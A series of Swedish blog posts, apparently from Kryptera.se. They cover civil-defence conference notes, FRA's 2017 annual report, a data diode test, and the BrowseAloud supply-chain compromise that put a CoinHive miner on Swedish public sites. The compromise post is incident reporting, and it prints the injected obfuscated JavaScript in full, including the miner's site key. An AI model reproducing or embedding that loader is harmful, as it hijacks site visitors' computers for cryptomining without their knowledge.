·       Totalförsvaret skall återuppbyggas – syftar till att skydda civilbefolkningen och stödja militära försvaret.

Beredskap måste kunna hantera påverkanskampanjer/cyberattacker och som sedan eskalerar.

·       85 miljoner 2017

·       400 miljoner 2018

Kommuner länsstyrelser mfl kan anställa mer o genomföra övningar.

Försvarsberedningen föreslår ny myndighet för Psykologiskt försvar – regeringen välkomnar detta och detta utreds nu.

Moderator: Förtroende är bra – Kontroll är bättre! Hur följer ni upp alla dessa initiativ?

CS: Har en rad tillsynsmyndigheter som följer upp.

CS hade en diskussion med sina kollegor i UK. Deras kommentar var –

Ägna inte för mycket energi att bygga om myndigheter

Vi har välfungerande FRA, MSB, SÄPO. Så instifta en ny myndighet är INTE det första vi skall göra.

Moderator: Utbildningsplatser?

CS: Måste hjälpas åt för att visa hur viktigt det är med dessa funktioner – för det räcker inte med att utöka antalet platser – måste även fylla dessa!

Beatrice Ask, Talesperson i civilförsvars- och civilberedskapsfrågor (M), Maktens reflektioner

FRA kommer som flourtanten på besök till företag och kommuner och berättar vad man skall tänka på.

Min roll är att SAMLA frågor som spänner över massa verksamheter.

Stuprörsproblematiken behöver en  Hängrännefunktion.

Har suttit med o granskat Transportstyrelsesituationen som del av KU – SÅ MKT DUMT man sett.

DOCK – Slänger en KÄNGA till Peter Hultqvist ang det fullkomligt galna i att ”förbjuda all utkontraktering”

Folk i vår ålder som lutar sig tillbaka och säger – det HÄR förstår inte jag – det får ungdomarna ta hand om. SKÄRP ER! Kompetensen måste upp på bred front!

Sverige är ett av de FÅ länder där man INTE ställer krav på Bankerna att ta emot kontanter!

Beatrice skickar med oss tre ”F” att begrunda efter denna konferens:

·       Förvåning! Är det något som Förvånat ER? Den snabba förändringshastigheten! Agera! Även om du inte har all information.

F.     Förskräckelse! Sjökablarna! Naivitet när jag granskat Transportstyrelsen. Källkritik o påverkan.

F.     Förväntan! Goda möjligheter att göra mkt bra. Vi skall inte vara NAIVA men ANVÄNDA digitala verktyg o utkontraktering osv.

Moderator: Kan de dåliga upphandlingarna bero på krånglig LoU?

BA: Javisst – men man måste ju även använda huvet själv. Min uppfattning är att man skyller ifrån sig. Upphandlingsförmågan måste bli bättre!

Vi måste lyfta oss i alla nivåer – Flourtanten behöver påminna om Cyberhygienen!

Moderator: Vad är du mest rädd för?

BA: Att Sverige inte kan hävda sig i den stenhårda internationella konkurrensen!

Nu kan du stödja Kryptera.se via Patreon

Jag har nu gjort det möjligt att bli månadsgivare via Patreon. Det innebär att du kan stödja mitt bloggande från 1$/månad vilket gör att jag kan lägga mer tid på att skriva många mer intressanta inlägg, bra va?

Det finns olika nivåer (rewards) som jag lagt upp, frivilligt så klart. Du kan således stödja ekonomiskt utan reward:

  • 5$ – Ditt namn listas på tacksidan
  • 10$ – Jag skickar några Kryptera.se-klistermärken med posten
  • 100$ – Du listas på tacksidan med klickbar länk
  • 200$ – Bild och länk på tacksidan

Andra möjligheter jag funderat på är sponsrade inlägg eller annonser. Men inget som jag gillar, utan föredrar att köra via Patreon.

Become a Patron!

FRA:s årsrapport 2017

Försvarets radioanstalt (FRA) släppte i fredags årsrapporten för 2017. Som vanligt så kan vi läsa om intressanta saker som hänt under det gångna året. Extra kul är också att myndigheten fyllt 75 år.

Jag har sammanfattat det jag tycker är mest intressant inom cyberområdet som framgår i årsrapporten:

  • Fler installationer av det tekniska detekterings- och varningssystem (TDV) har genomförts
  • FRA spelade en viktig del i att upptäcka Cloud Hopper. Även så släpptes ett PM i samband med detta, här kan du läsa det PM:et
  • Främmande underrättelseverksamhet utgörs i dag av avancerade IT-angrepp
  • Hybridhot och påverkansoperationer (PSYOPS) har blivit en risk som vi i Sverige inte kan bortse ifrån
  • När FRA genomför IT-säkerhetsanalyser för att hitta sårbarheter så är rapporterade sårbarheter kvar vid uppföljningar. Därför kommer FRA att samarbeta mer med Säkerhetspolisen för att ge ett mer kontinuerligt och operativt stöd

FRA har teknik och kunskap för att upptäcka och följa skadlig kod genom cyberrymden från de mest avancerade angriparna.

Skärmdump från årsrapporten

Här kan du ladda hem årsrapporten i sin helhet:

En annan rolig sak är att FRA numera kör med DNSSEC. Dock fortfarande många myndigheter som ej kör DNSSEC enligt myndighetermeddnssec.se.

Tidigare årsrapporter jag har skrivit om:

Säkerhetsbubblan nu över 3000 medlemmar

Facebookgruppen som jag och Karl Emil Nikka startade i November har nu nått 3000 medlemmar vilket är otroligt kul. Och vi tjänar inga pengar på gruppen utan den drivs helt ideellt av oss, precis som jag driver Kryptera.se.

Vi har några enkla regler samt så görs ett inlägg varje måndag med en sammanställning över vilka lediga jobb som finns ute just nu inom cybersäkerhet.

För att citera en av medlemmarna i gruppen:

Den mest givande kanalen just nu, och jag hakade på ganska direkt också. Jag tror att det här med högt och lågt, försöka dela med sig av kompletterande perspektiv och inte duka för att svara för de enkla frågorna är nycklar. Att faktiskt diskutera svenska förhållanden och sätta dem i sin kontext kan vara nog så viktigt inte bara i utbildning om säkerhet utan även i stadskunskap och ledningsfrågor som kan vara nog så viktiga för helheten.

Här hittar du gruppen: https://www.facebook.com/groups/sakerhetsbubblan/

Och undrar du varför gruppen har just ändelsen ”bubblan” så finns det en historia bakom. Här uppläst av Fredrik Wass:

https://soundcloud.com/bison/historien-om-hur-bubblan-blev

Javascript-miner installerad på hundratals populära svenska sajter

Uppdatering: En intressant iakttagelse jag har gjort är att sökfrågor på 1177.se skickas vidare till tredjeparter såsom Google och Browsealoud. Denna går att läsa ut via http referer headern eller window.location.href. Och ännu värre hade varit om en keylogger hade installerats i ba.js och då läst ut tips till polisen eller anonyma frågor till 1177.

För en stund sedan så modifierades en Amazon S3-lagringsplats som innehöll ett populärt javascript vid namn ba.js. Scriptet används för mjukvaran Browsealoud Web Screen Reader Software.

Följande skärmdump är från Reddit där en besökare till 1177.se som får en varning från sitt antivirus-program gällande CoinHive JS Miner:

Skärmdump av användaren ObjectiveDate på Reddit

Sökväg till scriptet som låg på Amazons CloudFront-tjänst d2pt7h3k9ifq48.cloudfront.net:

  • www.browsealoud.com/plus/scripts/ba.js

Och läser vi på om Coinhive så är det kryptovaluton Monero som det rör sig om (jag skrev tidigare felaktigt Bitcoin):

Coinhive offers a JavaScript miner for the Monero Blockchain (Why Monero?) that you can embed in your website

Och runt 4000 unika domäner länkar till detta script. Ett axplock av .se-domäner som länkar till scriptet som modifierats är följande:

  • lu.se
  • 1177.se
  • polisen.se
  • du.se
  • mah.se
  • malmo.se
  • hallakonsument.se
  • lund.se
  • skane.se
  • lansstyrelsen.se
  • mau.se
  • norrkoping.se
  • kungalv.se
  • botkyrka.se
  • informationsverige.se
  • finspang.se
  • moderaterna.se
  • linkoping.se
  • spsm.se
  • rsyd.se
  • karlstad.se
  • jonkoping.se
  • stockholmshem.se
  • abf.se
  • energimyndigheten.se
  • gotland.se
  • konsumentverket.se
  • humana.se
  • lfv.se
  • elsakerhetsverket.se
  • katrineholm.se
  • alingsas.se
  • haninge.se
  • arn.se
  • kulturradet.se
  • lanstrafikenkron.se
  • seom.se
  • xtrafik.se
  • fmv.se
  • vasamuseet.se
  • sigtuna.se
  • solleftea.se
  • sigtunahem.se
  • ljungby.se
  • do.se
  • alvdalen.se
  • ltkalmar.se
  • kalmar.se
  • jo.se
  • vannas.se
  • mjolby.se
  • folktandvardenskane.se
  • konsumenternas.se
  • musikverket.se
  • oskarshamn.se
  • moneyfromsweden.se
  • nordiskamuseet.se
  • autism.se
  • blekingetrafiken.se
  • knivsta.se
  • sbu.se

Och följande obfuskerade javascript-kod las till för att peka till CoinHive:

/* [Warning] Do not copy or self host this file, you will not be supported */ /* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d\x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 \x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c \x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

Tipstack till Linus Särud, Frans Rosén och Claes Magnusson.

Scriptet var modifierat mellan följande tidpunkter enligt Archive.org:

  • Sun, 11 Feb 2018 02:58:04 GMT
  • Sun, 11 Feb 2018 13:21:56 GMT

Ny integritetsfrämjande funktion i Mozilla

Mozilla inför från och med Firefox version 59 en intressant integritetsfrämjande åtgärd. Denna nya åtgärd begränsar den information som skickas till tredje-part via så kallade Referer-headers. Tidigare så skickades information såsom följande när du klickar på en länk som leder till en annan sajt:

Referer: https://www.reddit.com/r/privacy/comments/Preventing_data_leaks_by_stripping_path_information_in_HTTP_Referrers/

Vilket kan leda till känslig information kan läcka. Följande exempel är från healthcare.gov där information skickas vidare till ett antal leverantörer:

Även kan det förekomma sessions-information i URL:er. Men tittar vi på ovan information så har EFF rapporterat att följande URL läcker från healthcare.gov:

Referer: https://www.
healthcare.gov/see-plans/85601/results/?county=04019&age=40&smoker=1&pregnant=1&zip=85601&state=AZ&income=35000

Vilket kan vara typiskt obra. Men från Firefox version 59 så kommer enbart följande skickas vidare:

Referer: https://www.healthcare.gov/

Om du surfar i Private Browsing-mode. Sedan några år tillbaka finns även W3C standarden Referrer Policy där du som sajtadministratör själv kan välja hur Referer-headers ska fungera. Läs mer här:

Google startar cybersäkerhetsföretag: Chronicle

Nu startar Google upp ett nytt säkerhetsföretag vid namn Chronicle. Eller egentligen är det inte Google som startar upp företaget utan Googles moderbolag Alphabet. Chronicle är en avknoppning av Alphabets labbverksamhet som går under det mystiska namnet X.

Chronicle ska hjälpa till att stärka cybersäkerheten med bl.a. artificiell intelligens och smarta algoritmer. Även den populära tjänsten VirusTotal som Google köpte för några år sedan flyttas till Chronicle.

Stephen Gillett som är VD på Chronicle säger:

We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find. We are building our intelligence and analytics platform to solve this problem.

Och en annan relaterad och intressant nyhet är att Amazon köper upp företaget Sqrrl som grundats av ett antal personer som tidigare jobbat på NSA. Sqrrl har byggt en intressant plattform för Threat Hunting.

Test av Advenica datadiod SecuriCDS DD1000A

Datadioder är relativt simpla tekniska lösningar för att överföra data mellan två separata nätverk. Dioden ser till att kommunikation enbart kan genomföras åt det ena hållet mellan nätverken.

Tidigare har jag testat datadioden AROW från brittiska företaget Somerdata som du kan läsa om här.

Men denna gång har fått låna en datadiod från svenska företaget Advenica som har en produktserie vid namn SecuriCDS (CDS står för Cross Domain Solutions). Den mindre datadioden jag har lånat går under namnet DD1000A. Denna diod har en storebror som heter DD1000i som har ett antal extra funktioner såsom proxy-inspektion.

För att förevisa hur en datadiod kan kopplas in så har jag tagit ett exempel från en presentation från FRA:

Denna datadiod som jag har testat har blivit godkänd av Försvarsmakten till komponentassuransnivå N3, vilket är den näst högsta nivån och enligt Försvarsmaktens militära underrättelse- och säkerhetstjänst, MUST defineras N3-nivån enligt följande:

”MUST kan godkänna produkter vars funktionalitet helt eller till huvudsak syfta till att uppfylla IT-säkerhetskrav till N3. Alternativt kan produkten vara så modulärt uppbyggd att säkerhetsfunktionaliteten enkelt kan avgränsas och evalueras i enskildhet. Komponentutvecklaren ska bistå granskningen med allt granskaren behöver, såsom dokumentation och tillgång till relevanta resurser, t.ex. personal och testmiljö. Komponentutvecklaren ska visa att allt arbete med produkten styrs av en utförlig säkerhetsprocess som omfattar hela produktens livscykel.”

När jag testar datadioden så stöter jag på två problem: Det första är att den enbart pratar gigabit-hastighet och måste således hitta en enhet som jag kan ansluta på insidan samt utsidan som stödjer detta.

Andra problemet jag stöter på är att den enbart skickar vidare data på Layer 2 (ethernet) nivå. Således måste allt som skickas via den först konverteras till ett protokoll för enkelriktad kommunikation såsom UDP. Som tur är så finns det minst en open-source mjukvara för detta, udp-sender (–async). För den med utvecklingskunskap eller budget kan man givetvis utveckla detta själv specifikt för den information man vill överföra.

Att enheten inte har någon inbyggd proxy-funktionalitet är givetvis bra för säkerheten och något som jag anser är bättre att bygga in i fristående komponenter och därmed bygga sin säkerhet modulärt.

Advenica berättar att ingen information i enheten kan gå i backriktningen och att det bygger på flera lager av säkerhet, bland annat en optisk fiber med endast sändare på ena sidan, och endast mottagare på den andra sidan.

Vilket kan förevisas lättast genom följande övergripande illustration:

Sammanfattning

Jobbar du på en organisation som anser att säkerhet är viktigt bör du ha en datadiod som separationsfunktion mellan olika segment i nätverket. Men att slentrianmässigt installera en diod tycker jag är felaktigt, utan bör föregås av en analys.

Det kanske är så att ni i dagsläget har ett fysiskt åtskilt nätverk, då kan en diod exempelvis användas för att skicka loggar till ett loggnätverk. Eller att ni har videoutrustning såsom kameror som står i utsatta positioner och behöver skicka in videoströmmar.

Jag har inte tittat på redundans och failover i denna utvärdering. Men rekommenderar att införskaffa två SecuriCDS DD1000A om du ska bygga en lösning som ska ha hög tillgänglighet.

Andra datadioder förutom Arow från Somerdata är Arbit Data diod, Fox it datadiode, Thales ELIPS-SD, Secunet SINA OneWay, DIY och QinetQ SyBard.